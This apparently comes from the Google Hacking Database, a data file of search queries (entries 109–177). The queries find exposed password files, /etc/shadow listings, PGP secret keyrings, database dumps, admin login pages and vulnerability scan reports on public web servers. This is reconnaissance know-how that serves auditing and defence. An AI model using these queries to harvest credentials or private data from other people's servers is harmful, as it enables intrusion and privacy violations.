"https://www.exploit-db.com/ghdb/109/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Test+Page+for+Apache%22+%22It+Worked%21%22+%22on+this+web%22", "shortDescription": "intitle:\"Test Page for Apache\" \"It Worked!\" \"on this web\"", "textualDescription": "This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained." }, { "signatureReferenceNumber": "110", "link": "https://www.exploit-db.com/ghdb/110/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Can%27t+connect+to+local%22+intitle%3Awarning", "shortDescription": "\"Can't connect to local\" intitle:warning", "textualDescription": "Another SQL error message, this message can display database name, path names and partial SQL code, all of which are very helpful for hackers..." }, { "signatureReferenceNumber": "111", "link": "https://www.exploit-db.com/ghdb/111/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+dead.letter", "shortDescription": "intitle:index.of dead.letter", "textualDescription": "dead.letter contains the contents of unfinished emails created on the UNIX platform. Emails (finished or not) can contain sensitive information." }, { "signatureReferenceNumber": "112", "link": "https://www.exploit-db.com/ghdb/112/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+ws_ftp.ini", "shortDescription": "intitle:index.of ws_ftp.ini", "textualDescription": "ws_ftp.ini is a configuration file for a popular FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference. These should not be on the web!" }, { "signatureReferenceNumber": "113", "link": "https://www.exploit-db.com/ghdb/113/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+administrators.pwd", "shortDescription": "intitle:index.of administrators.pwd", "textualDescription": "This file contains administrative user names and (weakly) encrypted password for Microsoft Front Page. The file should not be readble to the general public." }, { "signatureReferenceNumber": "114", "link": "https://www.exploit-db.com/ghdb/114/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:secring+ext:skr+%7C+ext:pgp+%7C+ext:bak", "shortDescription": "inurl:secring ext:skr | ext:pgp | ext:bak", "textualDescription": "This file is the secret keyring for PGP encryption. Armed with this file (and perhaps a passphrase), a malicious user can read all your encrypted files! This should not be posted on the web!" }, { "signatureReferenceNumber": "115", "link": "https://www.exploit-db.com/ghdb/115/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3AIndex.of+etc+shadow", "shortDescription": "intitle:Index.of etc shadow", "textualDescription": "This file contains usernames and (lame) encrypted passwords! Armed with this file and a decent password cracker, an attacker can crack passwords and log into a UNIX system." }, { "signatureReferenceNumber": "116", "link": "https://www.exploit-db.com/ghdb/116/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Amanyservers.htm", "shortDescription": "inurl:ManyServers.htm", "textualDescription": "Microsoft Terminal Services Multiple Clients pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely." }, { "signatureReferenceNumber": "117", "link": "https://www.exploit-db.com/ghdb/117/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Terminal+Services+Web+Connection%22", "shortDescription": "intitle:\"Terminal Services Web Connection\"", "textualDescription": "Microsoft Terminal Services Web Connector pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely. In the worst case scenario these pages may allow an attacker to bypass a firewall gaining access to a \"protected\" machine." }, { "signatureReferenceNumber": "118", "link": "https://www.exploit-db.com/ghdb/118/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Remote+Desktop+Web+Connection%22", "shortDescription": "intitle:\"Remote Desktop Web Connection\"", "textualDescription": "Microsoft Remote Desktop Connection Web Connection pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely. In the worst case scenario these pages may allow an attacker to bypass a firewall gaining access to an otherwise inaccessible machine." }, { "signatureReferenceNumber": "119", "link": "https://www.exploit-db.com/ghdb/119/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22Welcome+to+Intranet%22", "shortDescription": "\"Welcome to Intranet\"", "textualDescription": "According to whatis.com: \"An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.\" Intranets, by definition should not be available to the Internet's unwashed masses as they may contain private corporate information." }, { "signatureReferenceNumber": "120", "link": "https://www.exploit-db.com/ghdb/120/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Asearch.php+vbulletin", "shortDescription": "inurl:search.php vbulletin", "textualDescription": "Version 3.0.0 candidate 4 and earlier of Vbulletin may have a cross-site scripting vulnerability. See http://www.securityfocus.com/bid/9656 for more info." }, { "signatureReferenceNumber": "121", "link": "https://www.exploit-db.com/ghdb/121/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Afooter.inc.php", "shortDescription": "inurl:footer.inc.php", "textualDescription": "From http://www.securityfocus.com/bid/9664, the AllMyPHP family of products (Versions 0.1.2 - 0.4) contains several potential vulnerabilities, som elalowing an attacker to execute malicious code on the web server." }, { "signatureReferenceNumber": "122", "link": "https://www.exploit-db.com/ghdb/122/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Ainfo.inc.php", "shortDescription": "inurl:info.inc.php", "textualDescription": "From http://www.securityfocus.com/bid/9664, the AllMyPHP family of products (Versions 0.1.2 - 0.4) contains several potential vulnerabilities, som elalowing an attacker to execute malicious code on the web server." }, { "signatureReferenceNumber": "123", "link": "https://www.exploit-db.com/ghdb/123/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Aadmin+intitle%3Alogin", "shortDescription": "inurl:admin intitle:login", "textualDescription": "This search can find administrative login pages. Not a vulnerability in and of itself, this query serves as a locator for administrative areas of a site. Further investigation of the surrounding directories can often reveal interesting information." }, { "signatureReferenceNumber": "124", "link": "https://www.exploit-db.com/ghdb/124/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aadmin+intitle%3Alogin", "shortDescription": "intitle:admin intitle:login", "textualDescription": "This search can find administrative login pages. Not a vulnerability in and of itself, this query serves as a locator for administrative areas of a site. Further investigation of the surrounding directories can often reveal interesting information." }, { "signatureReferenceNumber": "125", "link": "https://www.exploit-db.com/ghdb/125/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=filetype:asp+%22Custom+Error+Message%22+Category+Source&ie=UTF-8&oe=UTF-8", "shortDescription": "filetype:asp \"Custom Error Message\" Category Source", "textualDescription": "This is an ASP error message that can reveal information such as compiler used, language used, line numbers, program names and partial source code." }, { "signatureReferenceNumber": "126", "link": "https://www.exploit-db.com/ghdb/126/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=%22Fatal+error:+Call+to+undefined+function%22+-reply+-the+-next&hl=en&lr=lang_en&ie=UTF-8&oe=UTF-8&start=10&sa=N", "shortDescription": "\"Fatal error: Call to undefined function\" -reply -the -next", "textualDescription": "This error message can reveal information such as compiler used, language used, line numbers, program names and partial source code." }, { "signatureReferenceNumber": "127", "link": "https://www.exploit-db.com/ghdb/127/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=lang_en&ie=UTF-8&oe=UTF-8&q=inurl%3Aadmin+filetype%3Axls&btnG=Google+Search", "shortDescription": "inurl:admin filetype:xls", "textualDescription": "This search can find Excel spreadsheets in an administrative directory or of an administrative nature. Many times these documents contain sensitive information." }, { "signatureReferenceNumber": "128", "link": "https://www.exploit-db.com/ghdb/128/", "category": "Files containing usernames", "querystring": "http://www.google.com/search?hl=en&lr=lang_en&ie=UTF-8&oe=UTF-8&q=inurl%3Aadmin+inurl%3Auserlist&btnG=Google+Search", "shortDescription": "inurl:admin inurl:userlist", "textualDescription": "This search reveals userlists of administrative importance. Userlists found using this method can range from benign \"message group\" lists to system userlists containing passwords." }, { "signatureReferenceNumber": "129", "link": "https://www.exploit-db.com/ghdb/129/", "category": "Files containing usernames", "querystring": "http://www.google.com/search?hl=en&lr=lang_en&ie=UTF-8&oe=UTF-8&q=inurl%3Aadmin+filetype%3Aasp+inurl%3Auserlist&btnG=Google+Search", "shortDescription": "inurl:admin filetype:asp inurl:userlist", "textualDescription": "This search reveals userlists of administrative importance. Userlists found using this method can range from benign \"message group\" lists to system userlists containing passwords." }, { "signatureReferenceNumber": "130", "link": "https://www.exploit-db.com/ghdb/130/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&lr=lang_en&ie=UTF-8&oe=UTF-8&q=inurl%3Abackup+intitle%3Aindex.of+inurl%3Aadmin&btnG=Google+Search", "shortDescription": "inurl:backup intitle:index.of inurl:admin", "textualDescription": "This query reveals backup directories. These directories can contain various information ranging from source code, sql tables, userlists, and even passwords." }, { "signatureReferenceNumber": "131", "link": "https://www.exploit-db.com/ghdb/131/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=%22Welcome+to+PHP-Nuke%22+congratulations&ie=UTF-8&oe=UTF-8", "shortDescription": "\"Welcome to PHP-Nuke\" congratulations", "textualDescription": "This finds default installations of the postnuke CMS system. In many cases, default installations can be insecure especially considering that the administrator hasn't gotten past the first few installation steps." }, { "signatureReferenceNumber": "132", "link": "https://www.exploit-db.com/ghdb/132/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=allintitle:Netscape+FastTrack+Server+Home+Page&ie=UTF-8&oe=UTF-8", "shortDescription": "allintitle:Netscape FastTrack Server Home Page", "textualDescription": "This finds default installations of Netscape Fasttrack Server. In many cases, default installations can be insecure especially considering that the administrator hasn't gotten past the first few installation steps." }, { "signatureReferenceNumber": "133", "link": "https://www.exploit-db.com/ghdb/133/", "category": "Sensitive Directories", "querystring": "http://www.google.de/search?q=%22Welcome+to+phpMyAdmin%22+AND+%22+Create+new+database%22&btnG=Google+Suche&meta=", "shortDescription": "\"Welcome to phpMyAdmin\" \" Create new database\"", "textualDescription": "phpMyAdmin is a widly spread webfrontend used to mantain sql databases. The default security mechanism is to leave it up to the admin of the website to put a .htaccess file in the directory of the application. Well gues what, obviously some admins are either too lazy or don't know how to secure their directories. These pages should obviously not be accessable to the public without some kind of password ;-)" }, { "signatureReferenceNumber": "134", "link": "https://www.exploit-db.com/ghdb/134/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&safe=off&q=intitle%3A%22Index+of+c%3A%5CWindows%22", "shortDescription": "intitle:\"Index of c:\\Windows\"", "textualDescription": "These pages indicate that they are sharing the C:\\WINDOWS directory, which is the system folder for many Windows installations." }, { "signatureReferenceNumber": "135", "link": "https://www.exploit-db.com/ghdb/135/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&safe=off&q=warning+%22error+on+line%22+php+sablotron", "shortDescription": "warning \"error on line\" php sablotron", "textualDescription": "sablotron is an XML toolit thingie. This query hones in on error messages generated by this toolkit. These error messages reveal all sorts of interesting stuff such as source code snippets, path and filename info, etc." }, { "signatureReferenceNumber": "136", "link": "https://www.exploit-db.com/ghdb/136/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22Most+Submitted+Forms+and+Scripts%22+%22this+section%22", "shortDescription": "\"Most Submitted Forms and Scripts\" \"this section\"", "textualDescription": "More www statistics on the web. This one is very nice.. Lots of directory info, and client access statistics, email addresses.. lots of good stuff.These are SOOO dangerous, especially if INTRANET users get logged... talk about mapping out an intranet quickly..." }, { "signatureReferenceNumber": "137", "link": "https://www.exploit-db.com/ghdb/137/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Achangepassword.asp&btnG=Google+Search", "shortDescription": "inurl:changepassword.asp", "textualDescription": "This is a common script for changing passwords. Now, this doesn't actually reveal the password, but it provides great information about the security layout of a server. These links can be used to troll around a website." }, { "signatureReferenceNumber": "138", "link": "https://www.exploit-db.com/ghdb/138/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Select+a+database+to+view%22+intitle%3A%22filemaker+pro%22", "shortDescription": "\"Select a database to view\" intitle:\"filemaker pro\"", "textualDescription": "An oldie but a goodie. This search locates servers which provides access to Filemaker pro databases via the web. The severity of this search varies wildly depending on the security of the database itself. Regardless, if Google can crawl it, it's potentially using cleartext authentication." }, { "signatureReferenceNumber": "139", "link": "https://www.exploit-db.com/ghdb/139/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22not+for+distribution%22+confidential", "shortDescription": "\"not for distribution\" confidential", "textualDescription": "The terms \"not for distribution\" and confidential indicate a sensitive document. Results vary wildly, but web-based documents are for public viewing, and should neither be considered confidential or private." }, { "signatureReferenceNumber": "140", "link": "https://www.exploit-db.com/ghdb/140/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Thank+you+for+your+order%22+%2Breceipt", "shortDescription": "\"Thank you for your order\" +receipt", "textualDescription": "After placing an order via the web, many sites provide a page containing the phrase \"Thank you for your order\" and provide a receipt for future reference. At the very least, these pages can provide insight into the structure of a web-based shop." }, { "signatureReferenceNumber": "141", "link": "https://www.exploit-db.com/ghdb/141/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=allinurl%3Aintranet+admin", "shortDescription": "allinurl:intranet admin", "textualDescription": "According to whatis.com: \"An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.\" Intranets, by definition should not be available to the Internet's unwashed masses as they may contain private corporate information. Some of these pages are simply portals to an Intranet site, which helps with information gathering." }, { "signatureReferenceNumber": "142", "link": "https://www.exploit-db.com/ghdb/142/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=%0Aintitle%3A%22Nessus+Scan+Report%22+%22This+file+was+generated+by+Nessus%22+", "shortDescription": "intitle:\"Nessus Scan Report\" \"This file was generated by Nessus\"", "textualDescription": "This search yeids nessus scan reports. Even if some of the vulnerabilities have been fixed, we can still gather valuable information about the network/hosts. This also works with ISS and any other vulnerability scanner which produces reports in html or text format." }, { "signatureReferenceNumber": "143", "link": "https://www.exploit-db.com/ghdb/143/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=intitle%3A%22index.of.personal%22&btnG=Google+Search", "shortDescription": "intitle:\"index.of.personal\"", "textualDescription": "This directory has various personal documents and pictures." }, { "signatureReferenceNumber": "144", "link": "https://www.exploit-db.com/ghdb/144/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22This+report+lists%22+%22identified+by+Internet+Scanner%22", "shortDescription": "\"This report lists\" \"identified by Internet Scanner\"", "textualDescription": "This search yeids ISS scan reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned." }, { "signatureReferenceNumber": "145", "link": "https://www.exploit-db.com/ghdb/145/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22Network+Host+Assessment+Report%22+%22Internet+Scanner%22", "shortDescription": "\"Network Host Assessment Report\" \"Internet Scanner\"", "textualDescription": "This search yeids ISS scan reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned." }, { "signatureReferenceNumber": "146", "link": "https://www.exploit-db.com/ghdb/146/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22Network+Vulnerability+Assessment+Report%22", "shortDescription": "\"Network Vulnerability Assessment Report\"", "textualDescription": "This search yeids vulnerability scanner reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned." }, { "signatureReferenceNumber": "147", "link": "https://www.exploit-db.com/ghdb/147/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Host+Vulnerability+Summary+Report%22+", "shortDescription": "\"Host Vulnerability Summary Report\"", "textualDescription": "This search yeids host vulnerability scanner reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned." }, { "signatureReferenceNumber": "148", "link": "https://www.exploit-db.com/ghdb/148/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+inbox", "shortDescription": "intitle:index.of inbox", "textualDescription": "This search reveals potential location for mailbox files. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data." }, { "signatureReferenceNumber": "149", "link": "https://www.exploit-db.com/ghdb/149/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+inbox+dbx", "shortDescription": "intitle:index.of inbox dbx", "textualDescription": "This search reveals potential location for mailbox files. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data." }, { "signatureReferenceNumber": "150", "link": "https://www.exploit-db.com/ghdb/150/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+inbox+dbx", "shortDescription": "intitle:index.of cleanup.log", "textualDescription": "This search reveals potential location for mailbox files by keying on the Outlook Express cleanup.log file. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data." }, { "signatureReferenceNumber": "151", "link": "https://www.exploit-db.com/ghdb/151/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22%23mysql+dump%22+filetype%3Asql&btnG=Search", "shortDescription": "\"#mysql dump\" filetype:sql", "textualDescription": "This reveals mySQL database dumps. These database dumps list the structure and content of databases, which can reveal many different types of sensitive information." }, { "signatureReferenceNumber": "152", "link": "https://www.exploit-db.com/ghdb/152/", "category": "Vulnerable Servers", "querystring": "http://www.google.co.uk/search?q=allinurl:install/install.php&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N", "shortDescription": "allinurl:install/install.php", "textualDescription": "Pages with install/install.php files may be in the process of installing a new service or program. These servers may be insecure due to insecure default settings. In some cases, these servers may allow for a new installation of a program or service with insecure settings. In other cases, snapshot data about an install process can be gleaned from cached page images." }, { "signatureReferenceNumber": "153", "link": "https://www.exploit-db.com/ghdb/153/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Avbstats%2Ephp+%22page+generated%22", "shortDescription": "inurl:vbstats.php \"page generated\"", "textualDescription": "This is your typical stats page listing referrers and top ips and such. This information can certainly be used to gather information about a site and its visitors." }, { "signatureReferenceNumber": "154", "link": "https://www.exploit-db.com/ghdb/154/", "category": "Files containing usernames", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22index+of%22+%2F+lck", "shortDescription": "\"index of\" / lck", "textualDescription": "These lock files often contain usernames of the user that has locked the file. Username harvesting can be done using this technique." }, { "signatureReferenceNumber": "155", "link": "https://www.exploit-db.com/ghdb/155/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Index+of%22+%2F+%22chat%2Flogs%22+", "shortDescription": "\"Index of\" / \"chat/logs\"", "textualDescription": "This search reveals chat logs. Depending on the contents of the logs, these files could contain just about anything!" }, { "signatureReferenceNumber": "156", "link": "https://www.exploit-db.com/ghdb/156/", "category": "Files containing usernames", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=index%2Eof+perform%2Eini", "shortDescription": "index.of perform.ini", "textualDescription": "This file contains information about the mIRC client and may include channel and user names." }, { "signatureReferenceNumber": "157", "link": "https://www.exploit-db.com/ghdb/157/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22SnortSnarf+alert+page%22", "shortDescription": "\"SnortSnarf alert page\"", "textualDescription": "snort is an intrusion detection system. SnorfSnarf creates pretty web pages from intrusion detection data. These pages show what the bad guys are doing to a system. Generally, it's a bad idea to show the bad guys what you've noticed." }, { "signatureReferenceNumber": "158", "link": "https://www.exploit-db.com/ghdb/158/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:%22newsletter/admin/%22+intitle:%22newsletter+admin%22&hl=en", "shortDescription": "inurl:\"newsletter/admin/\" intitle:\"newsletter admin\"", "textualDescription": "These pages generally contain newsletter administration pages. Some of these site are password protected, others are not, allowing unauthorized users to send mass emails to an entire mailing list." }, { "signatureReferenceNumber": "159", "link": "https://www.exploit-db.com/ghdb/159/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:%22newsletter/admin/%22+intitle:%22newsletter+admin%22", "shortDescription": "inurl:\"newsletter/admin/\"", "textualDescription": "These pages generally contain newsletter administration pages. Some of these site are password protected, others are not, allowing unauthorized users to send mass emails to an entire mailing list. This is a less acurate search than the similar intitle:\"newsletter admin\" search." }, { "signatureReferenceNumber": "160", "link": "https://www.exploit-db.com/ghdb/160/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3AphpSysInfo%2F+%22created+by+phpsysinfo%22", "shortDescription": "inurl:phpSysInfo/ \"created by phpsysinfo\"", "textualDescription": "This statistics program allows the an admin to view stats about a webserver. Some sites leave this in a publically accessible web page. Hackers could have access to data such as the real IP address of the server, server memory usage, general system info such as OS, type of chip, hard-drive makers and much more." }, { "signatureReferenceNumber": "161", "link": "https://www.exploit-db.com/ghdb/161/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=allinurl%3A+admin+mdb+", "shortDescription": "allinurl: admin mdb", "textualDescription": "Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!" }, { "signatureReferenceNumber": "162", "link": "https://www.exploit-db.com/ghdb/162/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=allinurl%3A%22exchange%2Flogon.asp%22", "shortDescription": "allinurl:\"exchange/logon.asp\"", "textualDescription": "According to Microsoft \"Microsoft (R) Outlook (TM) Web Access is a Microsoft Exchange Active Server Application that gives you private access to your Microsoft Outlook or Microsoft Exchange personal e-mail account so that you can view your Inbox from any Web Browser. It also allows you to view Exchange server public folders and the Address Book from the World Wide Web. Anyone can post messages anonymously to public folders or search for users in the Address Book. \" Now, consider for a moment and you will understand why this could be potentially bad." }, { "signatureReferenceNumber": "163", "link": "https://www.exploit-db.com/ghdb/163/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&safe=off&q=intitle%3A%22Index+of%22+cfide", "shortDescription": "intitle:\"Index of\" cfide", "textualDescription": "This is the top level directory of ColdFusion, a powerful web development environment. This directory most likely contains sensitive information about a ColdFusion developed site." }, { "signatureReferenceNumber": "164", "link": "https://www.exploit-db.com/ghdb/164/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=intitle%3A%22ColdFusion+Administrator+Login%22", "shortDescription": "intitle:\"ColdFusion Administrator Login\"", "textualDescription": "This is the default login page for ColdFusion administration. Although many of these are secured, this is an indicator of a default installation, and may be inherantly insecure. In addition, this search provides good information about the version of ColdFusion as well as the fact that ColdFusion is installed on the server." }, { "signatureReferenceNumber": "165", "link": "https://www.exploit-db.com/ghdb/165/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Error+Occurred%22+%22The+error+occurred+in%22+filetype%3Acfm", "shortDescription": "intitle:\"Error Occurred\" \"The error occurred in\" filetype:cfm", "textualDescription": "This is a typical error message from ColdFusion. A good amount of information is available from an error message like this including lines of source code, full pathnames, SQL query info, database name, SQL state info and local time info." }, { "signatureReferenceNumber": "166", "link": "https://www.exploit-db.com/ghdb/166/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Alogin%2Ecfm", "shortDescription": "inurl:login.cfm", "textualDescription": "This is the default login page for ColdFusion. Although many of these are secured, this is an indicator of a default installation, and may be inherantly insecure. In addition, this search provides good information about the version of ColdFusion as well as the fact that ColdFusion is installed on the server." }, { "signatureReferenceNumber": "167", "link": "https://www.exploit-db.com/ghdb/167/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Acfm+%22cfapplication+name%22+password", "shortDescription": "filetype:cfm \"cfapplication name\" password", "textualDescription": "These files contain ColdFusion source code. In some cases, the pages are examples that are found in discussion forums. However, in many cases these pages contain live sourcecode with usernames, database names or passwords in plaintext." }, { "signatureReferenceNumber": "168", "link": "https://www.exploit-db.com/ghdb/168/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3A%22%3A10000%22+intext%3Awebmin", "shortDescription": "inurl:\":10000\" intext:webmin", "textualDescription": "Webmin is a html admin interface for Unix boxes. It is run on a proprietary web server listening on the default port of 10000." }, { "signatureReferenceNumber": "169", "link": "https://www.exploit-db.com/ghdb/169/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=allinurl%3A%2Fexamples%2Fjsp%2Fsnp%2Fsnoop%2Ejsp", "shortDescription": "allinurl:/examples/jsp/snp/snoop.jsp", "textualDescription": "These pages reveal information about the server including path information, port information, etc." }, { "signatureReferenceNumber": "170", "link": "https://www.exploit-db.com/ghdb/170/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=allinurl%3Aservlet%2FSnoopServlet", "shortDescription": "allinurl:servlet/SnoopServlet", "textualDescription": "These pages reveal server information such as port, server software version, server name, full paths, etc." }, { "signatureReferenceNumber": "171", "link": "https://www.exploit-db.com/ghdb/171/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Test+Page+for+Apache+Installation%22", "shortDescription": "intitle:\"Test Page for Apache\"", "textualDescription": "This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained." }, { "signatureReferenceNumber": "172", "link": "https://www.exploit-db.com/ghdb/172/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Alogin%2Easp", "shortDescription": "inurl:login.asp", "textualDescription": "This is a typical login page. It has recently become a target for SQL injection. Comsec's article at http://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.php brought this to my attention." }, { "signatureReferenceNumber": "173", "link": "https://www.exploit-db.com/ghdb/173/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%2Fadmin%2Flogin.asp+", "shortDescription": "inurl:/admin/login.asp", "textualDescription": "This is a typical login page. It has recently become a target for SQL injection. Comsec's article at http://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.php brought this to my attention." }, { "signatureReferenceNumber": "174", "link": "https://www.exploit-db.com/ghdb/174/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Running+in+Child+mode%22+", "shortDescription": "\"Running in Child mode\"", "textualDescription": "This is a gnutella client that was picked up by google. There is a lot of data present including transfer statistics, port numbers, operating system, memory, processor speed, ip addresses, and gnutella client versions." }, { "signatureReferenceNumber": "175", "link": "https://www.exploit-db.com/ghdb/175/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22This+is+a+Shareaza+Node%22", "shortDescription": "\"This is a Shareaza Node\"", "textualDescription": "These pages are from Shareaza client programs. Various data is displayed including client version, ip address, listening ports and uptime." }, { "signatureReferenceNumber": "176", "link": "https://www.exploit-db.com/ghdb/176/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22VNC+Desktop%22+inurl%3A5800", "shortDescription": "\"VNC Desktop\" inurl:5800", "textualDescription": "VNC is a remote-controlled desktop product. Depending on the configuration, remote users may not be presented with a password. Even when presented with a password, the mere existance of VNC can be important to an attacker, as is the open port of 5800." }, { "signatureReferenceNumber": "177", "link": "https://www.exploit-db.com/ghdb/177/", "category": "Sensitive Directories", 